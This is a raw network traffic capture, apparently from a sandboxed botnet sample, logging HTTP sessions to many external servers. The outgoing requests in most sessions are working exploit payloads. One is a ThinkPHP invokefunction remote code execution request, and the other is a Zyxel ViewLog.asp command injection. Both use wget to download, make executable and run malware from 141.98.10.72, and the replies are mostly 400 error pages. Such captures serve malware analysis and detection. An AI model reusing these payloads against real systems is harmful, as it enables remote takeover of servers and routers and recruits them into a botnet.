                                                            Feb 14, 2024 09:29:29.855135918 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:30.052490950 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:29 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:29 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 35 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 39 26 23 34 36 3b 32 64 36 30 66 61 30 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;653f655f&#46;1707899369&#46;2d60fa0d</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            675192.168.2.234118695.216.104.5280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:29.877845049 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:30.098006964 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:29 GMT
                                                            Server: Apache
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                            Feb 14, 2024 09:29:30.098028898 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                            Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                            Feb 14, 2024 09:29:30.098046064 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                            Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                            Feb 14, 2024 09:29:30.098063946 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                            Feb 14, 2024 09:29:30.098153114 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                            Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                            Feb 14, 2024 09:29:30.098174095 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                            Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                            Feb 14, 2024 09:29:30.098191977 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                            Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                            Feb 14, 2024 09:29:30.098262072 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to srv199.sixthstar.in's <a href="mailto:cpanelalerts
                                                            Feb 14, 2024 09:29:30.098287106 CET354INData Raw: 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49
                                                            Data Ascii: go&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 201


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            676192.168.2.233502888.198.127.24580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:30.063338041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:30.271318913 CET504INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:30 GMT
                                                            Server: Apache/2.4.38 (Debian)
                                                            Content-Length: 310
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6c 69 6e 6b 2e 62 69 74 61 77 61 6b 65 72 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at link.bitawaker.org Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            677192.168.2.235232288.99.203.16580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:30.085432053 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:30.726427078 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:30.935518026 CET427INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 06:26:22 GMT
                                                            Server: Apache
                                                            X-Frame-Options: DENY
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            678192.168.2.233316688.88.70.20980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:30.106622934 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:30.336368084 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:31 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            679192.168.2.234153431.136.57.648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.342453957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:34.390219927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:40.533315897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:52.563589096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.392152071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:06.537343979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            680192.168.2.234836485.245.30.138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.346127987 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            681192.168.2.234567694.121.99.338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.383183956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            682192.168.2.233449494.121.20.318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.384777069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
